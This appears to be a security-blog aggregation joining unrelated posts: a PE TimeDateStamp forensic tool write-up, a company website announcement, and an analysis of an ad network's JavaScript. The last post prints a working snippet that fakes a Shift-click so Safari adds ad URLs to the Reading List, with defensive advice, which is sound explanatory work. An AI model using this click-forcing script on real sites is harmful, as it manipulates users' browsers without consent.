I think this is a good course if you already know JavaScript but you are new to Node.js. Have fun with it if you decide to take it.

PE TimeDateStamp Viewer

In this post, I will share with you a tiny tool that I wrote to discover all occurrences of TimeDateStamps in a PE executable. The tool simply traverses the PE header and specifically the following structures/fields:

1) The "TimeDateStamp" field of the "_IMAGE_FILE_HEADER" structure.

This is the most notorious field that is always a target for both malware authors and forensic guys.

N.B. Certain versions of Delphi linkers always emit a fixed TimeDateStamp of 0x2A425E19, Sat Jun 20 01:22:17 1992. In this case you should not rely on this field and continue looking in other fields.

2) The "TimeDateStamp" field of the "_IMAGE_EXPORT_DIRECTORY" structure.

It is usually the same as or very close to the "TimeDateStamp" field of the "_IMAGE_FILE_HEADER" structure.

N.B. Not all linkers fill this field, but Microsoft Visual Studio linkers do fill it for both DLLs and EXEs.

3) The "TimeDateStamp" field of the "_IMAGE_IMPORT_DESCRIPTOR" structure.

Unlike what the name implies, this field is a bit useless if you are trying to determine when the executable was built. It is -1 if the executable/dll is bound (see #8) and zero if not. So, it is not implemented in my tool.

4) The "TimeDateStamp" field of the "_IMAGE_RESOURCE_DIRECTORY" structure.

Usually Microsoft Visual Studio linkers don't set it (I have tested with linker versions 6.0, 8.0, 9.0, and 10.0).

Borland C and Delphi set this field for the main _IMAGE_RESOURCE_DIRECTORY and its subdirectories.

Sometimes spoofers forget to forge this field for subdirectories.

5) The "TimeDateStamp" of the "_IMAGE_DEBUG_DIRECTORY" structures.

Microsoft Visual Studio linkers that emit debug info in the final PE always set this field. Spoofers may forge the field in the first "_IMAGE_DEBUG_DIRECTORY" structure and forget the following ones.

N.B. Debug info as pointed to by the Debug Data Directory is an array of "_IMAGE_DEBUG_DIRECTORY" structures, each representing debug info of a different type, e.g. COFF, CodeView, etc.

6) If "_IMAGE_DEBUG_DIRECTORY" has the "Type" field set to 0x2 (IMAGE_DEBUG_TYPE_CODEVIEW), then by following the "PointerToRawData" field we can find another occurrence of TimeDateStamp (only if the PDB format is PDB 2.0, i.e. when the "Signature" field is set to "NB10").


7) The "TimeDateStamp" field of the "_IMAGE_LOAD_CONFIG_DIRECTORY" structure.

I have not seen it being used before. However, it is implemented in the tool.

8) The "TimeDateStamp" field of the "_IMAGE_BOUND_IMPORT_DESCRIPTOR" structures.

It is the TimeDateStamp of the DLL that the executable is bound to. We can't use this field to know when the executable was built, but we can use it to determine on which Windows version/Service pack the file was built/bound. It is not implemented in the tool.
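
Items 1) and 6) above could be sketched in Python roughly as follows. This is not the tool's code: the function names are made up, the sample image is a synthetic header built only to exercise the parser, and the NB10 layout assumed here is the PDB 2.0 CodeView record (signature, offset, timestamp, age, PDB path).

```python
import struct
from datetime import datetime, timezone


def file_header_timestamp(image):
    """Item 1: IMAGE_FILE_HEADER.TimeDateStamp from the raw bytes of a PE file."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # The PE signature (4 bytes), Machine (2) and NumberOfSections (2)
    # come before TimeDateStamp.
    (stamp,) = struct.unpack_from("<I", image, e_lfanew + 8)
    return stamp


def nb10_timestamp(record):
    """Item 6: the timestamp in a PDB 2.0 ("NB10") CodeView record, else None."""
    if record[:4] != b"NB10":
        return None
    _offset, stamp, _age = struct.unpack_from("<III", record, 4)
    return stamp


def to_utc(stamp):
    """TimeDateStamp values count seconds since 1970-01-01 00:00:00 UTC."""
    return datetime.fromtimestamp(stamp, tz=timezone.utc)


def make_sample_image(stamp, e_lfanew=0x80):
    """Build a tiny synthetic header (not a loadable PE) for trying the parser."""
    image = bytearray(e_lfanew + 24)
    image[:2] = b"MZ"
    struct.pack_into("<I", image, 0x3C, e_lfanew)
    image[e_lfanew:e_lfanew + 4] = b"PE\0\0"
    struct.pack_into("<HHI", image, e_lfanew + 4, 0x014C, 1, stamp)
    return bytes(image)


DELPHI_STAMP = 0x2A425E19
sample = make_sample_image(DELPHI_STAMP)
print(hex(file_header_timestamp(sample)), to_utc(DELPHI_STAMP).isoformat())
```

Decoded as UTC, the fixed Delphi value is 1992-06-19 22:22:17, which suggests that the "Sat Jun 20 01:22:17 1992" quoted in item 1 was printed in a UTC+3 local time zone.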

The tool has a very simple command line. See below.

You can download the tool from here. For any bugs or suggestions, please don't hesitate to leave me a comment or contact me @waleedassar.

GitHub Project here.

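DEVCORE's New Website Is Online!

DEVCORE's new website is online!
Many thanks to the professionals at EVENDESIGN for designing such a beautiful website for us!

Our main services at the moment are penetration testing, security training, security incident handling, and security consulting.
Details of each service can be found on the Services page.

We will also publish the latest security news and technical articles on the site from time to time,
hoping to use our strength to make the importance of information security clearer to the public.
Through the tutorials on the site, developers and administrators can better understand how hackers think and how attack and defense work.
Know yourself and know your enemy, and you will never be in peril in a hundred battles. Understanding how to attack makes it clearer how to defend.

If you have any suggestions about our website content or services, feel free to get in touch at any time.
We hope to be the best gatekeeper for your enterprise's information security!
You are welcome to contact us at any time! contact [at] devco.re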

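An Analysis of Qiyou (奇優廣告) Advertising Techniques

Welcome to our technical articles column!

Today we will talk about ad display techniques. To increase ad exposure and click-through rates, many advertisers use all sorts of tricks to force ads on users: pop-up windows, embedded ads, forced redirects, and so on. But what is worth mentioning about such techniques? Today we have a rather special case, so let's look at the website "1kkk.com 極速漫畫".

Screenshot: 1kkk.com

This is an ordinary online comics site. Next, we click through to a comic page.

Screenshot: 1kkk.com comic page

The site is full of annoying ads, and a Safari "Reading List" animation suddenly flashes by. Why would that happen? Let's open the Reading List and find out.

Screenshot: Safari showing the Reading List sidebar

Screenshot: ad URLs placed in the Safari Reading List

After opening the Reading List, we were startled to find that a large number of ad pages had been added to it!

See the following video for a demonstration:

How is this done? It is a variation on using JavaScript to control mouse clicks. Open the Web Inspector or Developer Tools and you will see a strange piece of JavaScript that controls mouse click behaviour.

Screenshot: the ad JavaScript

After analysis, the excerpted code is as follows: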

<!DOCTYPE html>
<html>
<head>
  <script>
    var force_add_url_to_readinglist = function (target_url) {
      try {
        var fake_element = document.createElement('a');
        fake_element.setAttribute('href', target_url);
        fake_element.setAttribute('style', 'display:none;');

        // https://developer.mozilla.org/en-US/docs/Web/API/event.initMouseEvent
        var fake_event = document.createEvent('MouseEvents');
        fake_event.initMouseEvent('click', false, false, window, 0, 0, 0, 0, 0, false, false, true, false, 0, null);
        fake_element.dispatchEvent(fake_event);

      } catch ( error ) {
        // nothing.
      }
    };

    var url = 'http://google.com/?' + Math.random().toString().substr(1);
    force_add_url_to_readinglist(url);
  </script>
</head>

<body>

  <h1>Test: FORCE_ADD_URL_TO_READINGLIST</h1>

</body>
</html>

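The code uses initMouseEvent to simulate a mouse click on the URL with the Shift key held down. In most browsers a Shift-click means "open in a new window", but in Safari it means "add to Reading List", which is why ad pages keep getting added to the Reading List. Ad networks use this technique to raise the click-through rate of their ads; unless your browser has an ad-blocking extension installed or blocks pop-up windows, you become a contributor of traffic.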
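
The long positional argument list of initMouseEvent makes it hard to see which modifier is set. As a reading aid only, the small Python sketch below pairs the parameter names of the legacy DOM initMouseEvent call with the values passed in the snippet above; the string "window" merely stands in for the JavaScript window object.

```python
# Positional parameters of the legacy DOM initMouseEvent() call, in order.
INIT_MOUSE_EVENT_PARAMS = (
    "type", "canBubble", "cancelable", "view", "detail",
    "screenX", "screenY", "clientX", "clientY",
    "ctrlKey", "altKey", "shiftKey", "metaKey", "button", "relatedTarget",
)

# Values passed in the snippet above ("window" stands in for the JS window object).
SNIPPET_ARGS = ("click", False, False, "window", 0, 0, 0, 0, 0,
                False, False, True, False, 0, None)


def label_arguments(values):
    """Pair each positional value with its parameter name."""
    if len(values) != len(INIT_MOUSE_EVENT_PARAMS):
        raise ValueError("initMouseEvent takes %d arguments" % len(INIT_MOUSE_EVENT_PARAMS))
    return dict(zip(INIT_MOUSE_EVENT_PARAMS, values))


event = label_arguments(SNIPPET_ARGS)
modifiers = [key for key in ("ctrlKey", "altKey", "shiftKey", "metaKey") if event[key]]
print(event["type"], modifiers)
```

Only shiftKey is set, so the dispatched event is a Shift-click with the primary button (button 0).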

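In our tests, Internet Explorer and Mozilla Firefox were not affected by this kind of attack, while Google Chrome and Opera stopped it with their built-in pop-up blockers. If a plain click is simulated directly, however, every browser is affected and navigates to the URL. Although this type of attack causes no real loss or harm by itself, it can become a real attack when combined with other malicious techniques, for example redirecting users to a malicious site through code injected into a compromised website.

To avoid this type of attack, we suggest the following:

  1. Install a NoScript-type extension and only allow trusted websites to run JavaScript.
  2. Turn on pop-up blocking and raise the browser's security level for websites.
  3. Install an ad-blocking extension such as AdBlock (although this affects the revenue of websites).
  4. Use the latest version of your browser to stay safe.

Web-based attacks are becoming more and more diverse. Beyond relying on the browser's own protections supplemented by third-party security extensions, users also need their own security awareness in order to browse the web safely and at ease!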
